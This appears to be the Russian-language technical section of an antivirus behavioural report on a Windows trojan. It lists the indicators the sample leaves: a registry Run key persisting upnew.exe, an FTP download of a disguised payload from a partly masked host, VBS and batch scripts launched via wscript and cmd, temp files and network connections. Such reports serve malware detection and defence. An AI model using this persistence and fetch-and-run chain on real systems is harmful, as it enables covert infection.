Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] 'Run' = '%PROGRAM_FILES%\upnew.exe'
- <Текущая директория>\JAVA.COM ftp://a7############3456@ftp.download-servers.comuv.com/Downloads/Project1.jpg
- <SYSTEM32>\wscript.exe "<Текущая директория>\regs.vbs"
- <SYSTEM32>\ntvdm.exe -f
- <SYSTEM32>\cmd.exe /c set.bat
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- <Текущая директория>\JAVA.COM
- <Текущая директория>\sun.jva
- <Текущая директория>\regs.vbs
- <Текущая директория>\set.bat
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- 'ft#.#####oad-servers.comuv.com':21
- 'localhost':1035
- DNS ASK ft#.#####oad-servers.comuv.com
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-9dc.9e0.370001'